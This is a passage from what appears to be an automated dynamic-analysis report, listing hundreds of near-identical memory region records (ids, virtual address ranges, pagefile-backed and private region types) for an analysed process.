filename = "" Region: id = 20878 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20879 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20880 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20881 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20882 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20883 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20884 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20885 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20886 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20887 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20888 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20889 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20890 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 20891 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20892 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20893 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20894 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20895 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20896 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20897 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20898 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20899 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20900 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20901 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20902 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20903 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20904 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20905 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20906 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20907 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20908 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20909 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20910 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20911 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20912 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20913 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20914 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20915 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20916 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20917 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20918 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20919 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20920 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20921 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20922 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20960 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20961 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20962 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20963 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20964 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20965 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20966 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20967 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20968 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20969 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20970 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20971 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20972 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20973 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20974 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20975 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20976 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20977 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20978 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 20979 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20980 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20981 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20982 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20983 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20984 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20985 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20986 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20987 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20988 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20989 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20990 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20991 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 20992 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20993 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20994 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20995 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20996 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20997 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20998 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20999 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21000 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21001 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21002 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21003 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21004 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21005 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21006 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21007 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21008 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21009 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21010 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21011 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21012 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21013 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21014 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21015 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21026 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21027 start_va = 0x2a0000 end_va = 
0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21028 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21029 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21030 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21031 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21032 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21033 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21034 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21035 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21036 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21037 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21038 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21039 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21040 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21041 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21042 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21043 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21044 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21045 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21046 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21047 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21048 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21049 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21050 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21051 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21052 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 21053 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21054 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21055 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21056 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21057 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21058 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21059 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21060 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21061 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21062 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21063 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21064 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21065 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 21066 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21067 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21068 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21069 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21070 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21071 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21072 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21073 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21074 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21075 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21110 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21111 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21112 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21113 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21114 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21115 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21116 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21117 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21118 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21119 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21120 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21121 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21122 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21123 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21124 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21125 start_va = 0x2a0000 end_va = 0x2affff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21126 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21127 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21128 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21129 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21130 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21131 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21132 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21133 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21134 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21135 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21136 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21137 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21138 start_va 
= 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21139 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21140 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21141 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21142 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21143 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21144 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21145 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21146 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21147 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21148 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21149 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21150 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 21151 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21152 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21153 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21154 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21155 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21156 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21157 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 